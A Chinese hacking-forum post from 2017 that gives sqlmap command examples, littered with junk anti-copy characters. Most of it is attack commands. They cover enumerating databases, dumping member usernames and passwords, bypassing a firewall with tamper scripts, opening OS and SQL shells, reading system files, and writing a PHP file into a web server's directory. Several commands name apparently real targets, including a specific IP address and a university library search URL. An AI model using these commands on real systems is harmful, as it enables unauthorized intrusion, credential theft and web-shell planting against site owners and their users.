找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2564|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
. G$ [# j- k% w+ u, M3 e" V
& @2 \" f$ V8 z) uupdate :::::>     in the folder   after  execute    following   order : svn update5 q: S( o7 ~) ]) `  b

; q6 w) _) C. Y+ gsqlmap.py -r 1.txt --current-db$ v% x; ]. P, w% E+ F4 }& v7 Z

6 J. z# L( q5 e2 |4 l" Zv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”9 `; W. J7 L* f2 h- l" c/ S

+ w! W8 U3 a5 S9 }! m, k& E==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) * K$ e/ x) x  @3 ]( |
猜解数据库0 ]& O$ u' f3 U+ W3 }7 B
./sqlmap.py -u "injection-url" --dbs- Z5 H& F6 Z7 L0 k; E, }( o
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"/ P& a/ U8 T+ W& _, ^4 P0 A

: K5 M8 h3 I+ c, v0 Z! g8 p猜解表名
  C$ ^4 k' M. M# \( p0 l* D./sqlmap.py -u "injection-url" -D database_name --tables2 X9 P2 h, C1 r
) P. W& o2 r) g% F4 i  p
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py". n) x  a7 J. z0 Y& Y
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 6 d7 S4 b3 f0 ^

1 _3 m) ^$ x3 w5 ?" a$ Xsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
$ E  q. }/ P4 Q; {. E+ y9 d2 u* x' I* w
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
  `: _+ E& r1 `: V# X& K' Dsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
) M6 u" ?6 A1 B% z: E) Q% `sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"   a$ n. f9 y% S, C$ I
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
# ~6 U  }4 g$ G
! U3 H- O3 ]1 t1 S9 R9 o- ssqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
  Q2 N! [4 ?2 \: a' jsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"  h! L; }" ^1 O: J, p3 [( G
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py": h* a- b2 r4 M& Q, |
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"( P. z" ?( l& z5 s" U1 Q, D
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump1 J: ^- t, Q4 F( ?

& U) y0 Z, e: y* R2 T! ~sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
# B( }$ g. }" F4 Z3 t, S- _sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
3 `( h( S+ B$ T: u1 }; d! j- @6 h: S
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
8 D! b. J3 V8 X猜解列名/ t$ f# Z' w8 B; |) `
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns3 R+ N; ?( N1 u" T/ \6 `
* R; i$ {& i; }/ Y7 U
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" * b( t' L! e, W+ g0 ^9 T4 e
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
6 q$ s0 A& w4 ssqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"1 O9 Q( `2 m( ?* Z9 K& `& F5 j
. ~, Q5 B; ^9 w' r+ [+ h
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
, n0 }& p8 M- }2 _2 ]&submit=Go
3 N# l+ g( t6 K, Z8 N! z, }3 v猜解值  T9 w0 t+ Y" B
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
1 O6 m$ N$ L/ @! O. }' N+ Z========================================================. ?1 s0 r' l# Y  q. T( w
搜索表名中包括mana字符的2 E; R1 g( P! \* T0 [
/sqlmap.py -u "injection-url" -T mana --search/ v" x; O( \7 r/ ^  w# ?
返回一个交互式sql shell
. {0 N" Q8 A: P# G3 C/sqlmap.py -u "injection-url" --sql-shell% n3 E- m( M+ ~2 h! i$ g" C7 \& f
读取指定文件(需权限)
+ Z) y9 j4 v6 }3 W* }. h/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"& N6 i& m* |  j" I
查看当前 用户 及 数据库 % o8 f5 I, v7 E
/sqlmap.py -u "injection-url" --current-user --current-db
3 y! _- l" b$ Z, a' |, M# {: c本地文件 写入 远程目标绝对路径8 i" c. }5 p, d# J8 w
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
9 J) `+ E. R2 L% @sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 4 j  h) {4 ?$ R/ N2 s0 o# a( _$ l

7 w) Q* ~& N& }2 ]* r+ r4 psqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
( F1 V, z9 D3 O9 \, D' T查看某用的权限+ X1 h) N& u# d! z& V
/sqlmap.py -u "injection-url" --privileges -U root. U9 r8 X9 _) F+ ?7 {
查看当前用户是否为dba1 t$ f% Y8 y5 ~5 M' R$ X1 v
/sqlmap.py -u "injection-url" --is-dba
  t. H% F( e1 w+ l0 G读取所有数据库用户或指定数据库用户的密码3 n5 K, R# \+ f) K0 z2 o$ ]/ F
sqlmap.py -r 1.txt --users --passwords9 |7 r$ X' C% D8 W* g
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
4 }# j, Z# X* Z. B/ i# J
& T1 g( w; w! G2 K( r  x/sqlmap.py -u "injection-url" --passwords -U root  Q! y; J" X2 F1 }5 j: X; p

0 R9 _2 U) J! K1 Y- y--start&&--stop 与 --first&&--last 的区别
2 D! e0 Z# U- \/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)8 G4 F( A% a$ G/ P/ b. l
" G; q* V& c& @) C# e
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)% f1 h' N7 G: ~8 V+ D& [
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
: J6 ?$ X& D' P/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
" Y7 z) K+ I: \% B5 |! N4 ^6 |9 l
- y0 `/ R1 B$ A* `. ^9 s执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)# O& c/ b3 v# s# M) v* M7 H4 P& P1 K
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
$ k5 ^) f- w" s% Z/ D1 J
& R/ k1 n' g( H: S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表